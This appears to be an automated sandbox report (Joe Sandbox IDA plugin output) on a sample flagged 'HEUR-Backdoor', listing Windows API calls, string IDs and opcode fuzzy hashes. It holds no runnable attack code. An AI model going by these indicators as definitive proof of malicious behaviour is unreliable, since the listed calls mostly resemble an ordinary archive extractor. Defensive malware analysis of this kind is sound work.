                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 4fd46c6b951373a66a25dac6d47a17bb49fcfed1270b70bbd84aebd0356c2d9f
                                                • Instruction ID: cccbba2fbee19523821954606256a989bbaad01ba15c0ecc54eff7cf03852a67
                                                • Opcode Fuzzy Hash: 4fd46c6b951373a66a25dac6d47a17bb49fcfed1270b70bbd84aebd0356c2d9f
                                                • Instruction Fuzzy Hash: A3A002D627E146BC715851526D1BD76021CD4C8B613315519B516D41C16A585D455431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetCurrentDirectoryW.KERNELBASE(?,007EA587,C:\Users\user\Desktop,00000000,0081946A,00000006), ref: 007EA326
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory
                                                • String ID:
                                                • API String ID: 1611563598-0
                                                • Opcode ID: 783798438ce70992c56e6a77dc07935356841710f97f8f5271169dc59d45d5a1
                                                • Instruction ID: e869fe9227bd6450d92bd79c9cb6343b861e759be87af56ba5686608b3c45581
                                                • Opcode Fuzzy Hash: 783798438ce70992c56e6a77dc07935356841710f97f8f5271169dc59d45d5a1
                                                • Instruction Fuzzy Hash: 7EA0123019400656CB000B30CC0AC1576546760702F0086207002C00A0CB30C814A500
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
                                                  • Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365
                                                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 007EB971
                                                • EndDialog.USER32(?,00000006), ref: 007EB984
                                                • GetDlgItem.USER32(?,0000006C), ref: 007EB9A0
                                                • SetFocus.USER32(00000000), ref: 007EB9A7
                                                • SetDlgItemTextW.USER32(?,00000065,?), ref: 007EB9E1
• SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 007EBA18
• FindFirstFileW.KERNEL32(?,?), ref: 007EBA2E
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007EBA4C
• FileTimeToSystemTime.KERNEL32(?,?), ref: 007EBA5C
• GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 007EBA78
• GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 007EBA94
• _swprintf.LIBCMT ref: 007EBAC4
  • Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D
• SetDlgItemTextW.USER32(?,0000006A,?), ref: 007EBAD7
• FindClose.KERNEL32(00000000), ref: 007EBADE
• _swprintf.LIBCMT ref: 007EBB37
• SetDlgItemTextW.USER32(?,00000068,?), ref: 007EBB4A
• SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 007EBB67
• FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 007EBB87
• FileTimeToSystemTime.KERNEL32(?,?), ref: 007EBB97
• GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 007EBBB1
• GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 007EBBC9
• _swprintf.LIBCMT ref: 007EBBF5
• SetDlgItemTextW.USER32(?,0000006B,?), ref: 007EBC08
• _swprintf.LIBCMT ref: 007EBC5C
• SetDlgItemTextW.USER32(?,00000069,?), ref: 007EBC6F
  • Part of subcall function 007EA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 007EA662
  • Part of subcall function 007EA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0080E600,?,?), ref: 007EA6B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
Similarity
• API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
• String ID: %s %s$%s %s %s$REPLACEFILEDLG
• API String ID: 797121971-1840816070
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 007D7191
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 007D72F1
• CloseHandle.KERNEL32(00000000), ref: 007D7301
  • Part of subcall function 007D7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 007D7C04
  • Part of subcall function 007D7BF5: GetLastError.KERNEL32 ref: 007D7C4A
  • Part of subcall function 007D7BF5: CloseHandle.KERNEL32(?), ref: 007D7C59
• CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 007D730C
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 007D741A
• DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 007D7446
• CloseHandle.KERNEL32(?), ref: 007D7457
• GetLastError.KERNEL32 ref: 007D7467
• RemoveDirectoryW.KERNEL32(?), ref: 007D74B3
• DeleteFileW.KERNEL32(?), ref: 007D74DB
Strings
Similarity
• API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
• String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
• API String ID: 3935142422-3508440684
Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: H_prolog_memcmp
• String ID: CMT$h%u$hc%u
• API String ID: 3004599000-3282847064
Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 007D27F1
• _strlen.LIBCMT ref: 007D2D7F
  • Part of subcall function 007E137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,007DB652,00000000,?,?,?,0001041A), ref: 007E1396
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D2EE0
Strings
Similarity
• API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
• String ID: CMT
• API String ID: 1706572503-2756464174
Uniqueness Score: -1.00%

APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 007F8767
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 007F8771
• UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 007F877E
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
Uniqueness Score: -1.00%

Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness Score: -1.00%

APIs
• GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 007EA662
• GetNumberFormatW.KERNEL32(00000400,00000000,?,0080E600,?,?), ref: 007EA6B1
Similarity
• API ID: FormatInfoLocaleNumber
• String ID:
• API String ID: 2169056816-0
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(007E117C,?,00000200), ref: 007D6EC9
• FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 007D6EEA
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
Uniqueness Score: -1.00%

APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0080118F,?,?,00000008,?,?,00800E2F,00000000), ref: 008013C1
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
Uniqueness Score: -1.00%

Strings
Similarity
• API ID:
• String ID: gj
• API String ID: 0-4203073231
Uniqueness Score: -1.00%

                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 007DAD1A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Version
                                                • String ID:
                                                • API String ID: 1889659487-0
                                                • Opcode ID: 7535536bd06c8b32f6528c5be77d4c385b6cf78e57766574fa229a12b64c5893
                                                • Instruction ID: 992c4fb6e1a9ff1fb37f9a00254d112f7bd216419e04ee432d7cfddf364015d9
                                                • Opcode Fuzzy Hash: 7535536bd06c8b32f6528c5be77d4c385b6cf78e57766574fa229a12b64c5893
                                                • Instruction Fuzzy Hash: 8EF05B70E0060C8FCB24CF18EC425D573B6FB59711F10469AD91543798D7B46D81CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,007EEAC5), ref: 007EF068
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: ea0b88c9d9222711944c3a86269fbf3ac4ba1759c6505ea2f08c658dc034a381
                                                • Instruction ID: 6344f90d8a7330e354d2d681c126147c253565e7fe081e7d8ac59cc40e59ceb4
                                                • Opcode Fuzzy Hash: ea0b88c9d9222711944c3a86269fbf3ac4ba1759c6505ea2f08c658dc034a381
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: 54d0be813de643df426297e25ccc71128f639a8a57f1b10f89d22900c50bc23c
                                                • Instruction ID: 5ea46d2d7847806337a30605b8bd5fe641c738de8c534cb25e4cba0c09e81c87
                                                • Opcode Fuzzy Hash: 54d0be813de643df426297e25ccc71128f639a8a57f1b10f89d22900c50bc23c
                                                • Instruction Fuzzy Hash: 57A001B46022018BDB808FB6AA0E2093AADBA99A91709866AA509C6160EA2485609F11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                                • Instruction ID: 645c61cf3c32eb0cc05564329488c7299b32d044cf4d18f907434badf3c46ec7
                                                • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                                • Instruction Fuzzy Hash: 6C622971605BC99FCB25CF39C8906B9BBE1AFA9304F04856DD99B8B342D638E945CB10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                                • Instruction ID: 764f4cd911430224bf23c957083dab6661b687da2ff82b1ee810e7bb07e4a3c5
                                                • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                                • Instruction Fuzzy Hash: 9F6225706097CA9FC71DCF29C8805B9BBE1BF59308F14866DD9A687742E338E955CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                                • Instruction ID: 9948d3c66bd18088c51898b5f2157b845907c58a81f38787ee8b0c314eea2706
                                                • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                                • Instruction Fuzzy Hash: 795229726087058FC718CF19C891A6AF7E1FFCC304F498A2DE9859B255D734EA19CB86
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 850a0552ed23622c03eda8672ba53660739675351315613b49c19e16cda0a723
                                                • Instruction ID: 32ed8212ed981447c0760137e3895264b7ef6dc4499640357e054e24a23eba62
                                                • Opcode Fuzzy Hash: 850a0552ed23622c03eda8672ba53660739675351315613b49c19e16cda0a723
                                                • Instruction Fuzzy Hash: E812E4B17057868BC728CF29C894679B3E0FF68304F14893EE597C7A81E778A895CB45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8dab4b9b2e627726f5ad26cfd9de5bbea9923519f05a52dcd831738ee2d4018
                                                • Instruction ID: a3136d4f254ac8d2289e81ba02530ce4d0ea139be467b4789de679aa3b8f6965
                                                • Opcode Fuzzy Hash: e8dab4b9b2e627726f5ad26cfd9de5bbea9923519f05a52dcd831738ee2d4018
                                                • Instruction Fuzzy Hash: 90F166726083028FC719CE29C98496ABBF5EBC9314F148A2EF59597356D738E906CB42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction ID: dbb136d4d16c488388a9be8874249ff8179057ac39a43ff3259f8e0dc5387065
                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction Fuzzy Hash: E6C1A3362150974ADF2D4639893403FFBA16AA27B131A079DD5B3CB3C6FF28D524DA60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction ID: f7deec4da062b967c48b5073adbb2741d27a17b64f05ff4707cff4a5243ec56d
                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction Fuzzy Hash: 4FC1B6362051974ADF2D4639C93403FBBA16EA27B171A07ADD5B2CB3C5FF28D524D620
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                • Instruction ID: c8e726b16ee8fce23fd7f50f46ad3589bee3847d5f77a2f6adedbceea94cf7e9
                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                • Instruction Fuzzy Hash: 5CC186362051970ADF2D4639897403FBBA16EA17B131A079DD5B3CB3C6FF18D524DAA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
